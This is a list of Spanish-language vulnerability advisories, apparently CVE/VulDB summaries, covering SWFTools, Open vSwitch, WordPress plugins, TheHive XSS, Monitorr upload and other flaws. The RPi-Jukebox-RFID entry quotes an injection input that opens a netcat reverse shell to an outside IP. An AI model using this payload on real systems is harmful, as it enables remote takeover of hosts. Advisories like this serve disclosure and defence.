Vulnerabilidades

Una vulnerabilidad ha sido encontrada en Beijing Baichuo Smart S150 Management Platform V31R02B15 y clasificada como problemática. Una parte desconocida del archivo /log/download.php del componente Backup File Handler es afectada por una función desconocida. La manipulación conduce a la divulgación de información. Es posible iniciar el ataque de forma remota. La complejidad de un ataque es bastante alta. Se dice que la explotabilidad es difícil. El exploit ha sido divulgado al público y puede utilizarse. A esta vulnerabilidad se le asignó el identificador VDB-251541. NOTA: Se contactó primeramente con el proveedor sobre esta divulgación, pero no respondió de ninguna manera.

Se descubrió que swftools 0.9.2 contiene un desbordamiento de búfer en la región stack de la memoria mediante la función dict_foreach_keyvalue en swftools/lib/qc

Se descubrió que openvswitch 2.17.8 contenía una pérdida de memoria a través de la función xmalloc__ en openvswitch-2.17.8/lib/util.c.

Se descubrió que swftools 0.9.2 contiene un use-after-free de almacenamiento dinámico a través de la función bufferWriteData en swftools/lib/action/compile.c.

Vulnerabilidad de Server-Side Request Forgery (SSRF) en Montonio Montonio para WooCommerce, Wpopal Funciones principales de Wpopal, AMO para WP – Gestión de membresía ArcStone wp-amo, Long Watch Studio WooVirtualWallet – Una billetera virtual para WooCommerce, Long Watch Studio WooVIP – Complemento de membresía para WordPress y WooCommerce, Long Watch Studio WooSupply: proveedores, pedidos de suministro y gestión de existencias, Squidesma Theme Minifier, estilos Paul Clark Styles, Designmodo Inc. Creador de páginas de WordPress: Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Administrador de inicio de sesión personalizado CSS front-end, Team Agence-Press CSS Adder de Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU. Este problema afecta a Montonio para WooCommerce: desde n/a hasta 6.0.1; Funciones principales de Wpopal: desde n/a hasta 1.5.8; ArcStone: desde n/a hasta 4.6.6; WooVirtualWallet: una billetera virtual para WooCommerce: desde n/a hasta 2.2.1; WooVIP: complemento de membresía para WordPress y WooCommerce: desde n/a hasta 1.4.4; WooSupply – Proveedores, pedidos de suministro y gestión de existencias: desde n/a hasta 1.2.2; Minificador de temas: desde n/a hasta 2.0; Estilos: desde n/a hasta 1.2.3; Creador de páginas de WordPress – Qards: desde n/a hasta 1.0.5; PHPFreeChat: desde n/a hasta 0.2.8; CSS de front-end de administrador de inicio de sesión personalizado: desde n/a hasta 1.4.1; Complemento CSS de Agence-Press: desde n/a hasta 1.5.0; Confirmar datos: desde n/a hasta 1.0.7; Caja de herramientas AMP: desde n/a hasta 2.1.1; Administrador CSS MU: desde n/a hasta 2.6.

Vulnerabilidad de deserialización de datos no confiables en el complemento ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress. Este problema afecta a Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress desde n/a hasta 4.3.2.

Vulnerabilidad de deserialización de datos no confiables en Nextend Smart Slider 3. Este problema afecta a Smart Slider 3: desde n/a hasta 3.5.1.9.

Exposición de información confidencial a una vulnerabilidad de actor no autorizado en Wpmet Wp Social Login and Register Social Counter. Este problema afecta a Wp Social Login y Register Social Counter: desde n/a hasta 1.9.0.

Se encontró una vulnerabilidad en MiczFlor RPi-Jukebox-RFID hasta 2.5.0. Ha sido calificada como crítica. Una función desconocida del archivo userScripts.php del componente HTTP Request Handler es afectada por esta vulnerabilidad. La manipulación de la carpeta de argumentos con la entrada ;nc 104.236.1.147 4444 -e /bin/bash; conduce a la inyección de comando del sistema operativo. El ataque puede lanzarse de forma remota. El exploit ha sido divulgado al público y puede utilizarse. El identificador de esta vulnerabilidad es VDB-251540. NOTA: Se contactó primeramente con el proveedor sobre esta divulgación, pero no respondió de ninguna manera.

Se encontró una vulnerabilidad en Monitorr 1.7.6m. Ha sido declarada crítica. Una función desconocida del archivo /assets/php/upload.php del componente Services Configuration es afectada por esta vulnerabilidad. La manipulación del argumento fileToUpload conduce a una carga sin restricciones. El ataque se puede lanzar de forma remota. El exploit ha sido divulgado al público y puede utilizarse. El identificador asociado de esta vulnerabilidad es VDB-251539. NOTA: Se contactó primeramente con el proveedor sobre esta divulgación, pero no respondió de ninguna manera.

StrangeBee TheHive 5.1.0 a 5.1.9 y 5.2.0 a 5.2.8 es vulnerable a Cross Site Scripting (XSS) en la funcionalidad de archivo adjunto que permite a un atacante cargar un archivo HTML malicioso con código Javascript que se ejecutará en el contexto de la aplicación The Hive utilizando una URL específica. La vulnerabilidad se puede utilizar para obligar a la cuenta de una víctima a realizar acciones específicas en la aplicación para ayudar a un analista a convertirse en administrador.

StrangeBee TheHive 5.2.0 a 5.2.8 es vulnerable a Cross Site Scripting (XSS) en la funcionalidad de informes de casos. Esta característica permite a un atacante insertar código JavaScript malicioso dentro de la plantilla o sus variables, que se ejecutará en el contexto de la aplicación TheHive cuando se abra el informe HTML.